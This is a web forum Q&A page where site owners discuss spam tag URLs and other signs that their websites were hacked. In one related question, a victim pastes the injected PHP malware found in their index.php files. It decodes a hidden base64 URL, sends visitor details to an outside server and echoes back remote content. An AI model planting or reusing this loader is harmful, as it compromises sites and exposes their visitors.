I think My Site Has Been Hacked
-
I am working with a client and have noticed lots of 500 server errors that look very strange in their webmaster tools account.
I am seeing URLs like this blog/?tag=wholesale-cheap-nfl-jerseys-free-0702.html and blog/?tag=nike-jersey-shorts-4297.html
there are 155 similar pages yet the client does not sell anything like this and hasn't created these URLs. I have updated WP and all plugins and cannot find these links or pages on the site anywhere but I am guessing they are slowing the site down as GWT keeps highlighting them as errors.
Has anybody had any experiences with these types of hacks and can point me in the right direction of how to clean it up properly?
Ta
-
If they are tags then they should show up in the tag section of Posts or possibly in the comments. Not sure if you allow uploads to your site, but if you do you should check out the upload folder(s). Keep in mind, these URLs could be showing up somewhere out in cyberspace, not necessarily on your site. Take those steps I pointed out and you should see those ugly URLs go away within a few weeks, not accounting for other factors.
-
Woudl I be able to see this from the Dashboard as in by clicking the tags section or would they be hidden?
-
No! Sorry, SajeetNair. No disrespect here but don't click on these URLs. That's exactly what spammers want you to do. Simply follow the tips outlined in my post and these links will be ignored. Or better yet, disable any tag feature on your client's blog.
-
Looks like somebody or somebot is using your tag widget to tag your pages/posts with their dirty links. If you really need this tag feature, I suggest you make sure any links posted have a rel attribute of nofollow, and I'd add that /tag directory to your robots.txt something like this:
User-agent: *
Disallow: / *?tagAlso, login to your webmaster tools and add URL Parameters to let engines know to ignore these pages.
-
First click on one of the URLs and see the pages from which they are linking from. If its an internal link then check the source code and rectify the error. If its an external link then the third party website needs to be contacted and the links must be removed.
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Malicious links on our site indexed by Google but only visible to bots
We've been suffering from some very nasty black hat seo. In Google's index, our pages show external links to various pharmaceutical websites, but our actual live pages don't show them. It seems as though only certain user-agents see the malicious links. Setting up Screaming Frog SEO crawler using the Googlebot user agent also sees the malicious links. Any idea what could have caused this or how this can be stopped? We scanned all files on our webserver and couldn't find any of malicious links. We've changed our FTP and CMS passwords, is there anything else we can do? Thanks in advance!
White Hat / Black Hat SEO | | SEO-Bas0 -
Suspicious external links to site have 302 redirects
Hi, I have been asked to look at a site where I suspect some questionable SEO work, particularly link building. The site does seem to be performing very poorly in Google since January 2014, although there are no messages in WMT. Using WMT, OPenSiteExplorer, Majestic & NetPeak, I have analysed inbound links and found a group of links which although are listed in WMT, etc appear to 302 redirect to a directory in China (therefore the actual linking domain is not visible). It looks like a crude type of link farm, but I cant understand why they would use 302s not 301s. The domains are not visible due to redirects. Should I request a disavow or ignore? The linking domains are listed below: http://www.basalts.cn/
White Hat / Black Hat SEO | | crescentdigital
http://www.chinamarbles.com.cn/
http://www.china-slate.com.cn/
http://www.granitecountertop.com.cn/
http://www.granite-exporter.com/
http://www.sandstones.biz/
http://www.stone-2.com/
http://www.stonebuild.cn/
http://www.stonecompany.com.cn/
http://www.stonecontact.cn/
http://www.stonecrate.com/
http://www.stonedesk.com/
http://www.stonedvd.com/
http://www.stonepark.cn/
http://www.stonetool.com.cn/
http://www.stonewebsite.com/ Thanks Steve0 -
Can I use content from an existing site that is not up anymore?
I want to take down a current website and create a new site or two (with new url, ip, server). Can I use the content from the deleted site on the new sites since I own it? How will Google see that?
White Hat / Black Hat SEO | | RoxBrock0 -
How should I use the 2nd link if a site allows 2 in the body of a guest post?
I've been doing some guest posting, and some sites allow one link, others allow more. I'm worried I might be getting too many guest posts with multiple links. I'd appreciate your thoughts on the following: 1. If there are 50+ guest posts going to my website (posted over the span of several months), each with 2 links pointing back only to my site is that too much of a pattern? How would you use the 2nd link in a guest post if not to link to your own site? 2. Does linking to .edu or .gov in the guest post make the post more valuable in terms of SEO? Some people recommend using the 2nd link to do this. Thanks!
White Hat / Black Hat SEO | | pbhatt0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Site being targeted by hardcore porn links
We noticed recently a huge amount of referral traffic coming to a client's site from various hard cord porn sites. One of the sites has become the 4th largest referrer and there are maybe 20 other sites sending traffic. I did a Whois look up on some of the sites and they're all registered to various people & companies, most of them are pretty shady looking. I don't know if the sites have been hacked or are deliberately sending traffic to my client's site, but it's obviously a concern. The client's site was compromised a few months ago and had a bunch of spam links inserted into the homepage code. Has anyone else seen this before? Any ideas why someone would do this, what the risks are and how we fix it? All help & suggestions greatly appreciated, many thanks in advance. MB.
White Hat / Black Hat SEO | | MattBarker0 -
Am I Being Penalized For Having My Whole Site In A Subfolder Named With A Keyword?
I inherited a client. For some reason, their previous webmaster set up the site so everything is in a subfolder /law/. It's an attorney website. All the urls have the primary domain name /law/ and then assigned url. I can't image this is helping but could the site be penalized for this by Google or Bing? It's set up like this: www.attorneysite.com**/law/**therestoftheurl /law/ is included in EVERY PAGE... even the homepage.
White Hat / Black Hat SEO | | DeltonChilds0 -
Competitors have local "mirror" sites
I have noticed that some of my competitors have set up "mirror" homepages set up for different counties, towns, or suburbs. In one case the mirror homepages are virtually identical escept for the title and in the other case about half of the content id duplicate and the other half is different. both of these competors have excellent rankings and traffic. I am surprised about these results, does anyone care to comment about it and is this a grey hat technique that is likely to be penalized eventually. thx Diogenes
White Hat / Black Hat SEO | | diogenes0